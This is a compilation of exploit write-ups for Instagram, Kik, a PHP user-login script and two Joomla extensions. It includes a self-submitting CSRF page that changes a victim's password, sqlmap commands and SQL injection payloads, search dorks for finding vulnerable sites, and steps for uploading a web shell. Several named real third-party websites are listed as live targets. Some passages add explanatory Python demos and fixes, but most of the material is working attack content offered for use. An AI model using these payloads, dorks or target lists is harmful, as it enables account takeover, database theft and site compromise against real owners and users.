[ Exploits ]



NOTE: READ PDF FOR INSTRUCTIONS:

Contains the following: Instagram exploit (reset an Instagram account password via XSS), Kik exploit (get into the Kik database via a Kik bot)

  • pdf for insta exploit: https://mega.nz/#!x3pCHaAK!HmJDuNN0Lm7ODt79Pl_68GG_VkKGelvQ5JM0bOA05Jc

  • pdf for kik exploit: https://mega.nz/#!QuA2mR7C!BIdu2-Q9CrMvJsuOC88JxCHzlDPJP5iDtN9e-kKbd4o



    User Login and Management PHP Script

    <!--  
     # Exploit Title:  User Login and Management PHP Script - multiple vulnerabilities  
     # Exploit Author: Ali BawazeEer || https://sa.linkedin.com/in/alibawazeeer 
     # Dork: N/A 
     # Date: 29.08.2017 
     # Software link: https://www.codester.com/items/469/user-login-and-management-php-script 
     # Demo: http://froiden.cloudapp.net/LoginDashboard/index.php 
     # Version: 3.04 
     # Category: Webapps 
     # Tested on: Windows 64-bit / Mozilla Firefox  
     #  
     # 
     --> 
      
     |---------------------------------------------------------------------------------- 
      
     1) admin dashboard authentication bypass  
      
     Description : Attackers are able to completely compromise a web application built on the 
     User Login and Management PHP Script: they can reach the admin panel and manage other 
     users as an admin without authenticating. The dashboard answers an unauthenticated 
     request with a redirect to the login page but still renders the admin page body after 
     sending the Location header, so suppressing the redirect in the browser is enough. 
       
       
     Step 1: Create a rule in the No-Redirect add-on: ^http://localhost/LoginDashboard/admin/index.php 
     Step 2: Access http://localhost/LoginDashboard/admin/dashboard.php 
       
       
     Risk : Unauthenticated attackers gain full access to the administrator panel and thus 
     total control over the application and its users, including adding admin users. 
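     The two steps above can be reproduced outside the browser. The following Python is an added example, not code from the advisory or the vendor: it fetches a page without honouring the redirect (what the No-Redirect add-on does) and flags an execution-after-redirect bug when a 3xx response still carries the protected page in its body. The marker strings and the two sample responses are assumptions constructed for the demo; on a real target they would be tuned to the dashboard's HTML. The server-side fix for this class of bug is an `exit;` immediately after `header('Location: ...')`.

```python
import http.client
from urllib.parse import urlsplit

# Strings expected only on the post-login page. Assumption, not taken from the
# product: the dashboard lists users in a table and offers a logout link.
ADMIN_MARKERS = (b"dashboard", b"logout", b"<table")


def fetch_without_redirect(url, timeout=10):
    """GET a URL once and return (status, headers, body) without following redirects.

    http.client never acts on a Location header, which is what the No-Redirect
    add-on achieves in the browser; the body of a 302 is returned as-is.
    """
    parts = urlsplit(url)
    conn_cls = http.client.HTTPSConnection if parts.scheme == "https" else http.client.HTTPConnection
    conn = conn_cls(parts.hostname, parts.port, timeout=timeout)
    path = (parts.path or "/") + ("?" + parts.query if parts.query else "")
    conn.request("GET", path, headers={"User-Agent": "ear-check/0.1"})
    resp = conn.getresponse()
    body = resp.read()
    conn.close()
    return resp.status, dict(resp.getheaders()), body


def leaks_body_on_redirect(status, headers, body, markers=ADMIN_MARKERS):
    """Execution-after-redirect check: a 3xx with a Location header whose body
    still contains the protected page is the bug the No-Redirect trick exploits."""
    if not 300 <= status < 400:
        return False
    if "location" not in {k.lower() for k in headers}:
        return False
    lowered = body.lower()
    return any(marker.lower() in lowered for marker in markers)


def check(url):
    """Probe a live target; True when dashboard content leaks past the redirect."""
    return leaks_body_on_redirect(*fetch_without_redirect(url))


# Constructed responses, not captured from the product. The vulnerable shape is
# what header('Location: index.php') without a following exit produces.
VULNERABLE_RESPONSE = (
    302,
    {"Location": "index.php", "Content-Type": "text/html; charset=UTF-8"},
    b"<html><body><h1>Admin Dashboard</h1>\n"
    b"<table><tr><td>alice</td><td>admin</td></tr></table>\n"
    b'<a href="logout.php">Logout</a></body></html>',
)
FIXED_RESPONSE = (302, {"Location": "index.php"}, b"")

if __name__ == "__main__":
    print("vulnerable sample leaks:", leaks_body_on_redirect(*VULNERABLE_RESPONSE))
    print("fixed sample leaks:", leaks_body_on_redirect(*FIXED_RESPONSE))
```

     Against a live install, `check("http://localhost/LoginDashboard/admin/dashboard.php")` with no session cookie should return False once the redirect is followed by `exit;`; a 200 response without any redirect would indicate a different (and simpler) missing-check bug that this function deliberately does not classify.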
      
      
     |---------------------------------------------------------------------------------- 
      
      
     2) account takeover - cross-site request forgery  
      
      
     Description : An attacker can craft a malicious page and send it to any user who is already 
     authenticated; loading it changes that user's password. The password-change endpoint accepts 
     the new password from the query string, and the PoC supplies nothing but the new password and 
     its confirmation, so neither an anti-CSRF token nor the current password stands in the way. 
      
     > exploitation <  
      
      
     <html> 
     <body> 
     <form name="csrf_form" action="http://localhost/LoginDashboard/code/ajaxChangePassword.php?password=1234567890&cpassword=1234567890" method="POST"> 
     </form> 
     <script type="text/javascript">document.csrf_form.submit();</script> 
     </body> 
     </html> 
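     To make the missing checks concrete, here is an added Python model of the password-change handler (example code, not the vendor's PHP): the vulnerable variant merges query-string and body parameters the way `$_REQUEST` does and ties nothing to a form the user submitted, so the forged POST above succeeds; the hardened variant reads the body only, compares a per-session CSRF token in constant time and demands the current password. The user store, session layout and parameter names are assumptions made for the demo.

```python
import hashlib
import hmac
import os
import secrets


def hash_pw(password, salt):
    # PBKDF2 stands in for whatever the real application uses to store passwords.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)


def make_store(user, password):
    """Constructed user store: {user: (salt, hash)}."""
    salt = os.urandom(16)
    return {user: (salt, hash_pw(password, salt))}


def verify_pw(store, user, password):
    salt, stored = store[user]
    return hmac.compare_digest(stored, hash_pw(password, salt))


def new_session(user):
    # One random token per session, rendered into the legitimate form as a hidden field.
    return {"user": user, "csrf_token": secrets.token_hex(32)}


def change_password_vulnerable(store, session, method, query, form):
    """Models the behaviour the PoC relies on: parameters come from the query string
    as well as the body, and nothing binds the request to the user's own form."""
    params = {**query, **form}
    if not params.get("password") or params.get("password") != params.get("cpassword"):
        return "mismatch"
    salt = os.urandom(16)
    store[session["user"]] = (salt, hash_pw(params["password"], salt))
    return "changed"


def change_password_hardened(store, session, method, query, form):
    """Assumed fix: POST body only, constant-time token check, re-authentication."""
    if method != "POST":
        return "method not allowed"
    token = form.get("csrf_token", "")
    if not hmac.compare_digest(token.encode(), session["csrf_token"].encode()):
        return "bad csrf token"
    if not verify_pw(store, session["user"], form.get("current_password", "")):
        return "wrong current password"
    new = form.get("password", "")
    if not new or new != form.get("cpassword"):
        return "mismatch"
    salt = os.urandom(16)
    store[session["user"]] = (salt, hash_pw(new, salt))
    return "changed"


# The request the advisory's page produces: a cross-origin POST whose only
# parameters travel in the query string (body is empty).
FORGED_QUERY = {"password": "1234567890", "cpassword": "1234567890"}


def demo():
    store = make_store("alice", "original-secret")
    session = new_session("alice")
    forged = change_password_vulnerable(store, session, "POST", FORGED_QUERY, {})

    store2 = make_store("alice", "original-secret")
    blocked = change_password_hardened(store2, session, "POST", FORGED_QUERY, {})
    legit = change_password_hardened(store2, session, "POST", {}, {
        "csrf_token": session["csrf_token"],
        "current_password": "original-secret",
        "password": "n3w-long-passphrase",
        "cpassword": "n3w-long-passphrase",
    })
    return forged, blocked, legit, verify_pw(store2, "alice", "n3w-long-passphrase")


if __name__ == "__main__":
    print(demo())  # ('changed', 'bad csrf token', 'changed', True)
```

     Marking the session cookie `SameSite=Lax` or `Strict` is a worthwhile second layer, but it does not replace the token: the attacker's page here is a plain form POST, which `Lax` blocks, yet older browsers and some top-level navigations do not honour the attribute.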
      
      
     |-----------------------------------------EOF-----------------------------------------

    Joomla Component Calendar Planner 1.0.1 - SQL Injection (searchword parameter)



    -- Date: 20/08/2017
    -- Vendor Homepage: http://joomlathat.com/
    -- W10
    -- Software Link: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/calendar-planner/
    -- Version: 1.0.1
    -- Category: Webapps
    -- Dorks:
    === Dork1: "inurl:option=com_calendarplanner"
    === Dork2: "inurl:/index.php/component/calendarplanner/events?searchword=&option=com_calendaprlanner&view=events&category_id="
    === Dork3: "inurl:events?searchword=&option=com_calendarplanner&view=events&category_id="
    -- Credits: Information - Anonymous
    -- Author: Ihsan Sencan
    -- Web: http://ihsan.net/
    -- Confirming the injection: remove "&date_in=2017-04-17&date_out=&access_select=1&multiselect=1&option=com_calendarplanner&view=events&category_id=0" from the URL
    and add 0' to the searchword parameter (searchword=0').
    Message: Alert: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '') ORDER BY ev.date_start ASC , ev.hour_start ASC' at line 1
    The fragment after "near" shows the parameter is concatenated into a quoted, parenthesised pattern that is followed by ORDER BY; the sqlmap payloads below close that string and parenthesis with ") and append their own clauses.
    -- Dumping the database: strip the same trailing parameters (everything from &date_in=2017-04-17 to &category_id=0) so that searchword= is the last parameter, then run sqlmap:

    --- sqlmap -u "https://www.site.com/es/component/calendarplanner/events?searchword=" --dbs

    -- Demo:
    - http://www.dipartimentodesign.polimi.it/agenda/events?searchword=&date_in=2017-01-02&date_out=&option=com_calendarplanner&view=events&category_id=0
    - http://www.aumaujaya.org/index.php/2013-02-24-18-14-58/events/events?searchword=&date_in=2017-04-23&date_out=&access_select=0&access_select=1&option=com_calendarplanner&view=events&category_id=0'
    - http://www.cadam-solutions.ch/2017/index.php/component/calendarplanner/events?searchword=&date_in=2017-04-23&date_out=&access_select=0&access_select=1&option=com_calendarplanner&view=events&category_id=0'
    - http://www.akdh-ev.de/ausstellungen/ausstellungstermine.html?searchword=&date_in=2017-04-23&date_out=&access_select=0&access_select=1&option=com_calendarplanner&view=events&category_id=0'
    - http://www.akdh-ev.de/ausstellungen/ausstellungstermine.html?searchword=&date_in=2017-05-18&date_out=&access_select=0&access_select=1&option=com_calendarplanner&view=events&category_id=0'
    - https://www.serenacentral.com/community/events/events?searchword=&date_in=2017-07-28&date_out=&access_select=0&access_select=1&option=com_calendarplanner&view=events&category_id=0'
    - http://www.dipartimentodesign.polimi.it/agenda/events?searchword=&date_in=2017-03-30&date_out=&option=com_calendarplanner&view=events&category_id=0'
    -- PoC (sqlmap output for the searchword parameter):

    ============================================

    ==Parameter: searchword (GET)
    ====== Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: searchword=") AND 6499=6499#

    ====== Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: searchword=") OR (SELECT 7934 FROM(SELECT COUNT(*),CONCAT(0x7176717071,(SELECT (ELT(7934=7934,1))),0x7170627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ("jqvr"="jqvr

    ====== Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: searchword=") OR SLEEP(5) AND ("mmOk"="mmOk

    ====== Type: UNION query
    Title: MySQL UNION query (NULL) - 29 columns
    Payload: searchword=") UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176717071,0x796145654d6e6f6f436e41637678434f74496f765a626a666c645461484d63747648525a56565175,0x7170627a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    =============================================================
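    The boolean-based blind technique in the first sqlmap entry is easy to misread from the payload alone, so here is an added, self-contained Python example (not from the advisory or the extension) that rebuilds the vulnerable query shape implied by the error message, drives a true/false oracle through it, and recovers a table name one character at a time. It uses SQLite in memory so it runs offline; the real target is MySQL/MariaDB, where the page's payloads use ") and # instead of the ') and -- used here, and SUBSTRING() over information_schema instead of substr() over sqlite_master. The events rows and column names are constructed for the demo, and the parameterised `search_fixed` shows the fix.

```python
import sqlite3
import string

# Constructed rows standing in for the extension's events table.
EVENTS = [
    ("Design week opening", "2017-04-17", "09:00"),
    ("Robotics seminar", "2017-04-20", "14:00"),
    ("Open day", "2017-05-02", "10:00"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE events (id INTEGER PRIMARY KEY, title TEXT, "
                 "date_start TEXT, hour_start TEXT)")
    conn.executemany("INSERT INTO events (title, date_start, hour_start) VALUES (?, ?, ?)", EVENTS)
    return conn


def search_vulnerable(conn, searchword):
    # The shape the advisory's error message points at: the raw parameter is
    # pasted into a quoted LIKE pattern inside parentheses, then ORDER BY follows.
    sql = ("SELECT id, title FROM events WHERE (title LIKE '%" + searchword + "%') "
           "ORDER BY date_start ASC, hour_start ASC")
    return conn.execute(sql).fetchall()


def search_fixed(conn, searchword):
    # Bound parameter: the wildcard pattern is built in code and passed as a value,
    # so quotes and parentheses in the input can never reach the parser.
    return conn.execute(
        "SELECT id, title FROM events WHERE (title LIKE ?) ORDER BY date_start ASC, hour_start ASC",
        ("%" + searchword + "%",),
    ).fetchall()


def blind_oracle(conn, condition):
    """Boolean-based blind oracle with the structure of sqlmap's
    searchword=") AND 6499=6499#  : close the string and the parenthesis,
    append a condition, comment out the rest. Rows come back only if it is true."""
    payload = "') AND (" + condition + ")-- "
    return len(search_vulnerable(conn, payload)) > 0


def extract_first_table(conn, max_len=32):
    """Recover the first table name character by character through the oracle.
    sqlite_master plays the role MySQL's information_schema.tables would play."""
    alphabet = string.ascii_lowercase + string.digits + "_"
    name = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            cond = ("substr((SELECT name FROM sqlite_master WHERE type='table' "
                    "ORDER BY name LIMIT 1),%d,1)='%s'" % (pos, ch))
            if blind_oracle(conn, cond):
                name += ch
                break
        else:
            break  # no candidate matched: end of the name
    return name


if __name__ == "__main__":
    db = make_db()
    print("oracle 1=1:", blind_oracle(db, "1=1"))      # True
    print("oracle 1=2:", blind_oracle(db, "1=2"))      # False
    print("first table:", extract_first_table(db))     # events
    print("fixed query, same payload:", search_fixed(db, "') AND (1=1)-- "))  # []
```

    Each character costs up to 37 requests with this linear alphabet; sqlmap narrows it with a binary search over character codes, which is why its run is fast even without the error-based or UNION channels listed above. The error-based payload (FLOOR(RAND(0)*2) with GROUP BY) and SLEEP() are MySQL-specific and have no SQLite equivalent here.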



    Joomla com_weblinks Shell Upload Vulnerability

    # Exploit Title : Joomla com_weblinks Shell Upload Vulnerability
    # Exploit Author : Dyar Sahdi
    # Website : https://www.facebook.com/Dyar.Sahdi.Linux
    # Dork : allinurl:/index.php?option e_name jform_description asset=com_weblinks
    -----------------------------------------------------------------------
    Exploit Tools
    ----------------------
    http://extensions.joomla.org/extensions/extension/official-extensions/weblinks

    -------------------------------------------------------------------------------------
    Tested on: Kali Linux, Win7, Win XP, Win10
    ---------------------------------------------------
    First select a site using the dorks
    --------------------------
    Example: http://www.elitecreative.ca/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author=
    -------------------------------------------------------------------------------------------------------------------------------
    http://target/site/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author=

    -----------------------------------------------
    Uploading the shell
    ----------------------
    The URL opens Joomla's core media manager image picker (com_media) with the weblinks component named as the asset being edited; Joomla normally requires the visitor to hold upload (core.create) rights for that asset, so the dork finds sites whose ACL or configuration grants that to the visitor.
    Upload your shell, txt or image through its upload field. Which file types are accepted is governed by the site's Media Options legal-extensions list (.txt is allowed by default, .php is not), so unless that list has been loosened the dropped file lands as a non-executable staging file rather than a live PHP shell.
    Shell directory (files are stored under the site's images folder): http://localhost/site/images/dyar.txt
    ----------------------------

    http://www.orrca.org.au/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author=
    #
    http://egyptfuntours.com/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author=
    #
    http://englishshotokan.net/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author=
    #################################################################